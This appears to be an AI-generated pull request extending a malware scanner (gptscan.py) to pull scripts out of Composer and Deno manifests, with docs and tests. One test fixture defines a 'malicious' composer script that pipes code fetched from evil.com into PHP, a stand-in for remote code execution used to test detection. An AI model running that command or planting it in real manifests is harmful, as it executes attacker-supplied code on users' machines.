### PR TITLE
[FEAT] Expanded Package Manifest Support (Composer & Deno)

### DIFF
--- a/gptscan.py
+++ b/gptscan.py
@@ -390,7 +390,7 @@ class Config:
         # but keep Path objects for file-system operations.
         path_str = str(file_path).lower()
         # Check archive and container extensions
-        is_container = path_str.endswith(('.zip', '.tar', '.tar.gz', 'package.json', '.yml', '.yaml'))
+        is_container = path_str.endswith(('.zip', '.tar', '.tar.gz', 'package.json', 'composer.json', 'deno.json', 'deno.jsonc', '.yml', '.yaml'))
         if not is_container:
             basename = os.path.basename(path_str)
             is_container = basename == 'dockerfile' or basename == 'makefile' or basename.endswith(('.dockerfile', '.makefile'))
@@ -1962,18 +1962,51 @@ def unpack_content(name: str, content: bytes, depth: int = 0, hint: Optional[str
         except Exception:
             pass
 
-    # 4. Check for package.json scripts
-    if check_name.lower().endswith('package.json'):
+    # 4. Check for package manifests (package.json, composer.json, deno.json/jsonc)
+    lowered_check = check_name.lower()
+    if lowered_check.endswith(('package.json', 'composer.json', 'deno.json', 'deno.jsonc')):
         try:
-            pkg = json.loads(content.decode('utf-8', errors='ignore'))
-            if isinstance(pkg, dict) and 'scripts' in pkg:
-                scripts = pkg.get('scripts', {})
-                if isinstance(scripts, dict):
-                    for script_name, command in scripts.items():
-                        if isinstance(command, str) and command.strip():
-                            yield (f"{name} [Script: {script_name}]", command.encode('utf-8'))
+            text = content.decode('utf-8', errors='ignore')
+            if lowered_check.endswith('.jsonc'):
+                # Strip single-line and multi-line comments for JSONC support
+                # This regex strips /* ... */ comments and // ... comments while attempting to ignore
+                # // if it appears inside a double-quoted string (to avoid mangling URLs).
+                text = re.sub(
+                    r'(/\*.*?\*/)|("(?:\\.|[^"\\])*")|(//[^\n]*)',
+                    lambda m: m.group(2) if m.group(2) else " ",
+                    text,
+                    flags=re.DOTALL
+                )
+
+            manifest = json.loads(text)
+            if not isinstance(manifest, dict):
+                return
+
+            # Determine key and label based on manifest type
+            key = 'scripts'
+            label = 'Script'
+            if 'deno.json' in lowered_check:
+                key = 'tasks'
+                label = 'Task'
+
+            scripts = manifest.get(key, {})
+            if isinstance(scripts, dict):
+                yielded_any = False
+                for script_name, command in scripts.items():
+                    if isinstance(command, str):
+                        if command.strip():
+                            yield (f"{name} [{label}: {script_name}]", command.encode('utf-8'))
+                            yielded_any = True
+                    elif isinstance(command, list):
+                        # Support for array-based scripts (common in composer.json)
+                        for i, cmd in enumerate(command, 1):
+                            if isinstance(cmd, str) and cmd.strip():
+                                yield (f"{name} [{label}: {script_name} ({i})]", cmd.encode('utf-8'))
+                                yielded_any = True
+                if yielded_any:
                     return
-            # If it's a package.json but has no scripts, we don't want to scan it as a script
+
+            # If it's a manifest but has no scripts/tasks, we don't want to scan it as a whole file
             return
         except Exception:
             pass
@@ -5213,7 +5246,7 @@ def create_gui(initial_path: Optional[str] = None) -> tk.Tk:
 def main():
     import argparse
     parser = argparse.ArgumentParser(
-        description="Scan scripts, archives (ZIP/TAR), Jupyter Notebooks, package.json files, CI/CD workflows (GitHub Actions, GitLab CI), Markdown files, HTML files, and web links (GitHub/GitLab/Gist) for malicious code using AI.",
+        description="Scan scripts, archives (ZIP/TAR), Jupyter Notebooks, package manifests (package.json, composer.json, deno.json), CI/CD workflows (GitHub Actions, GitLab CI), Markdown files, HTML files, and web links (GitHub/GitLab/Gist) for malicious code using AI.",
         epilog="Examples:\n"
                "  # Scan a folder using AI analysis\n"
                "  python gptscan.py ./my_scripts --cli --use-gpt\n\n"

--- a/readme.md
+++ b/readme.md
@@ -88,7 +88,7 @@ The scanner finds scripts in several ways:
 *   **By file type:** It recognizes common script types (like `.py`, `.js`, `.sh`, and `.ps1`) and Jupyter Notebooks (`.ipynb`) using the included `extensions.txt` file.
 *   **By archive content:** It can inspect scripts hidden inside `.zip`, `.tar`, and `.tar.gz` files.
 *   **By Jupyter Notebook cells:** It extracts and scans individual code cells from `.ipynb` files.
-*   **By package.json scripts:** It extracts and scans individual commands from the `scripts` object in `package.json` files.
+*   **By package manifest scripts:** It extracts and scans individual commands from the `scripts` or `tasks` object in `package.json`, `composer.json`, and `deno.json`/`deno.jsonc` files.
 *   **By CI/CD workflow scripts:** It extracts and scans `run`, `script`, and `command` blocks from YAML files (GitHub Actions, GitLab CI, etc.).
 *   **By Dockerfile instructions:** It extracts and scans `RUN`, `CMD`, and `ENTRYPOINT` instructions from Dockerfiles.
 *   **By Makefile recipes:** It extracts and scans recipes from Makefiles.
@@ -120,7 +120,7 @@ Run `python gptscan.py` to open the GUI.
 *   **Path to scan:** Type one or more paths (separated by spaces) or choose from the dropdown. It remembers your last 10 locations.
 *   **File...:** Select one or more files to scan.
 *   **Folder...:** Select a whole directory to scan.
-*   **URL...:** Scan a script, Notebook, HTML, Markdown file, or archive (.zip, .tar, .tar.gz) directly from a web link.
+*   **URL...:** Scan a script, Notebook, HTML, Markdown, manifest (package.json, etc.), or archive (.zip, .tar, .tar.gz) directly from a web link.
 *   **Clipboard:** Scan code currently in your clipboard.
 
 #### Scan Options

--- a/tests/test_manifest_scanning.py
+++ b/tests/test_manifest_scanning.py
@@ -1,0 +1,116 @@
+import json
+import pytest
+from gptscan import unpack_content, Config, scan_files
+from unittest.mock import MagicMock, patch
+import gptscan
+
+def test_unpack_composer_json_scripts():
+    """Test that unpack_content correctly extracts scripts from composer.json."""
+    composer_data = {
+        "name": "vendor/package",
+        "description": "A PHP project",
+        "scripts": {
+            "post-install-cmd": [
+                "php -r \"copy('.env.example', '.env');\"",
+                "php artisan key:generate"
+            ],
+            "test": "phpunit",
+            "malicious": "curl -s http://evil.com/shell.php | php"
+        }
+    }
+    composer_content = json.dumps(composer_data).encode('utf-8')
+    results = list(unpack_content("composer.json", composer_content))
+
+    # Should find 4 scripts: 2 from the list, 1 test, 1 malicious
+    assert len(results) == 4
+
+    script_names = [r[0] for r in results]
+    assert "composer.json [Script: post-install-cmd (1)]" in script_names
+    assert "composer.json [Script: post-install-cmd (2)]" in script_names
+    assert "composer.json [Script: test]" in script_names
+    assert "composer.json [Script: malicious]" in script_names
+
+    script_contents = [r[1] for r in results]
+    assert b"php artisan key:generate" in script_contents
+    assert b"phpunit" in script_contents
+    assert b"curl -s http://evil.com/shell.php | php" in script_contents
+
+def test_unpack_deno_json_tasks():
+    """Test that unpack_content correctly extracts tasks from deno.json."""
+    deno_data = {
+        "tasks": {
+            "start": "deno run --allow-net main.ts",
+            "test": "deno test",
+            "build": "deno compile --output main main.ts"
+        }
+    }
+    deno_content = json.dumps(deno_data).encode('utf-8')
+    results = list(unpack_content("deno.json", deno_content))
+
+    # Should find 3 tasks
+    assert len(results) == 3
+
+    task_names = [r[0] for r in results]
+    assert "deno.json [Task: start]" in task_names
+    assert "deno.json [Task: test]" in task_names
+    assert "deno.json [Task: build]" in task_names
+
+    task_contents = [r[1] for r in results]
+    assert b"deno run --allow-net main.ts" in task_contents
+    assert b"deno test" in task_contents
+
+def test_unpack_deno_jsonc_with_comments():
+    """Test that unpack_content handles deno.jsonc with comments."""
+    deno_jsonc = """
+    {
+        // This is a comment
+        "tasks": {
+            /* This is also a comment */
+            "start": "deno run main.ts",
+            "check": "deno check **/*.ts" // Inline comment
+        }
+    }
+    """
+    deno_content = deno_jsonc.encode('utf-8')
+    results = list(unpack_content("deno.jsonc", deno_content))
+
+    # Should find 2 tasks despite comments
+    assert len(results) == 2
+
+    task_names = [r[0] for r in results]
+    assert "deno.jsonc [Task: start]" in task_names
+    assert "deno.jsonc [Task: check]" in task_names
+
+    task_contents = [r[1] for r in results]
+    assert b"deno run main.ts" in task_contents
+    assert b"deno check **/*.ts" in task_contents
+
+def test_unpack_deno_jsonc_with_urls():
+    """Test that unpack_content handles deno.jsonc with URLs in strings and comments."""
+    deno_jsonc = """
+    {
+        "tasks": {
+            "fetch": "curl https://example.com/api", // This // should not be stripped
+            "run": "deno run --allow-net=google.com main.ts" /* block // comment */
+        }
+    }
+    """
+    deno_content = deno_jsonc.encode('utf-8')
+    results = list(unpack_content("deno.jsonc", deno_content))
+
+    assert len(results) == 2
+
+    task_contents = [r[1] for r in results]
+    assert b"curl https://example.com/api" in task_contents
+    assert b"deno run --allow-net=google.com main.ts" in task_contents
+
+def test_is_supported_file_manifests():
+    """Test that composer.json and deno.json are recognized as supported containers."""
+    assert Config.is_supported_file("composer.json") is True
+    assert Config.is_supported_file("deno.json") is True
+    assert Config.is_supported_file("deno.jsonc") is True
+    assert Config.is_supported_file("sub/dir/composer.json") is True
+
+    # Verify non-container versions for members
+    assert Config.is_supported_file("composer.json", is_member=True) is False
+    assert Config.is_supported_file("deno.json", is_member=True) is False


### PR DESCRIPTION
This PR implements expanded support for package manifest files, bringing PHP (Composer) and Deno ecosystems into the scanner's automated script extraction pipeline.

### Changes:
1.  **Expanded Container Detection:** `composer.json`, `deno.json`, and `deno.jsonc` are now recognized as containers, allowing the scanner to dive into them even if they are within archives or being scanned as part of a directory.
2.  **Manifest Script Extraction:** The `unpack_content` function now identifies the `scripts` key in `composer.json` and the `tasks` key in `deno.json`. It handles both standard string commands and the array-based command format frequently used in the PHP ecosystem.
3.  **String-Aware JSONC Support:** Added a robust, string-aware comment-stripping regex for `.jsonc` files. This ensures that comments are removed before JSON parsing while URLs and other strings containing `//` or `/*` are correctly preserved.
4.  **Documentation Updates:** Updated the CLI help description and `readme.md` to reflect the broader support for package manifests.
5.  **New Tests:** Added `tests/test_manifest_scanning.py` which verifies extraction from Composer, Deno (JSON and JSONC), and ensures that URLs within JSONC are not mangled.

This feature follows the "Symmetry" and "Batching" heuristics by treating all major ecosystem manifests with the same level of scrutiny as `package.json`.

---
*PR created automatically by Jules for task [13708214134999735699](https://jules.google.com/task/13708214134999735699) started by @RainRat*